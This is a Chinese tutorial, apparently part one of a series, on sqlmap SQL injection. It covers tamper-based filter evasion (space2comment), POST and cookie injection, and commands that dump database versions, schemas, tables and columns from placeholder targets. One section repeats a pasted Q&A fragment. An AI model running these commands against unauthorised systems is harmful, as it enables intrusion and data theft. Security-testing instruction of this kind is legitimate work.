sqlmap过滤连续空格的方法(一)

简介: sqlmap过滤连续空格的方法(一)

  image.png

一、指定脚本

tamper=space2comment是SQLMAP的一个参数,用于指定使用space2comment.py脚本进行注入测试时的数据处理方式。具体来说,space2comment.py脚本的作用是将SQLMAP检测目标时所使用的payload中的空格全部替换成注释。通过使用这个参数,可以增加注入测试的成功率。

范例:<<引用:–>sqlmap->tamper,选中space2comment.py文件,并打开(记事本也可以) 。 引用:这段代码为space2comment.py脚本文件的核心代码,其作用是将SQLMAP检测目标时所使用的payload 中的空格全部替换成注释。 2.启动SQLMAP 。 请回答我或者给我介绍或演示一下:–tamper=space2comment是什么意思? tamper=space2comment是SQLMAP的一个参数,用于指定使用space2comment.py脚本进行注入测试时的数据处理方式。具体来说,space2comment.py脚本的作用是将SQLMAP检测目标时所使用的payload中的空格全部替换成注释。通过使用这个参数,可以增加注入测试的成功率。你可以按照以下步骤来使用这个参数:

打开SQLMAP。

在命令行中输入--tamper=space2comment。

SQLMAP将使用space2comment.py脚本对注入测试的payload进行处理,将其中的空格替换成注释。

运行注入测试,以提高成功率。

二、post请求

检测「post请求」的注入点,使用BP等工具「抓包」,将http请求内容保存到txt文件中。

-r 指定需要检测的文件,SQLmap会通过post请求方式检测目标。

sqlmap -r bp.txt


三、cookie注入

--cookie 指定cookie的值,单/双引号包裹。

sqlmap -u "http://xx?id=x" --cookie 'cookie'


四、脱库

获取所有内容

sqlmap -u 'http://xx/?id=1' -a


-a 就是 all 的意思,获取所有能获取的内容,会消耗很长时间。

image.png

1、获取数据库

--dbs 获取数据库

1、获取数据库版本

sqlmap -u 'http://xx/?id=1' -b

image.png

2、获取当前使用的数据库

sqlmap -u 'http://xx/?id=1' --current-db

image.png

3、获取所有数据库

sqlmap -u 'http://xx/?id=1' --dbs

image.png

4、获取表

--tables 获取表

4.1获取表,可以指定数据库

sqlmap -u 'http://xx/?id=1' -D 'security' --tables

image.png

4.2同时获取多个库的表名,库名用逗号分隔。

sqlmap -u 'http://xx/?id=1' -D 'security,sys' --tables

image.png

4.3不指定数据库,默认获取数据库中所有的表

sqlmap -u 'http://xx/?id=1' --tables

image.png

最后面显示每个数据库下都有哪些表。

5、获取字段

--columns 参数用来获取字段。

5.1、获取字段,可以指定库和表

提示:只指定库名但不指定表名会报错。

sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --columns

image.png

接下篇:https://developer.aliyun.com/article/1620077

相关文章
|
2月前
|
Shell 网络安全 数据库
sqlmap过滤连续空格的方法(二)
sqlmap过滤连续空格的方法(二)
|
4月前
正则查找符合条件的数据
正则查找符合条件的数据
36 0
|
6月前
|
Java
JAVA工具类匹配重复或者连续的字符和符号
JAVA工具类匹配重复或者连续的字符和符号
|
7月前
|
存储 关系型数据库 MySQL
MySQL查询:过滤掉字母
【5月更文挑战第5天】
|
7月前
|
索引 Python
字符串:比较、拼接、切割、转义字符;相关切割、替换、查找、去除空白、转大小写函数的方法
字符串:比较、拼接、切割、转义字符;相关切割、替换、查找、去除空白、转大小写函数的方法
43 0
|
7月前
过滤多余的字符串
过滤多余的字符串
27 0
|
7月前
|
Java
java读取txt文件,使用逗号,分号,空格,回车将文件内容分割成一个一个的词组,找出所有重复的词组
java读取txt文件,使用逗号,分号,空格,回车将文件内容分割成一个一个的词组,找出所有重复的词组
159 38
|
Shell
Shell 过滤数据(cut 截取过滤列)
Shell 过滤数据(cut 截取过滤列)
97 0
|
数据安全/隐私保护 索引
labview字符串数据长度连接子字符串大小写替换删除插入日期匹配
labview字符串数据长度连接子字符串大小写替换删除插入日期匹配
263 0
|
存储 关系型数据库 MySQL
mysql字符串等值查询中条件字段值末尾有空格也能查到数据问题
mysql字符串等值查询中条件字段值末尾有空格也能查到数据问题
252 0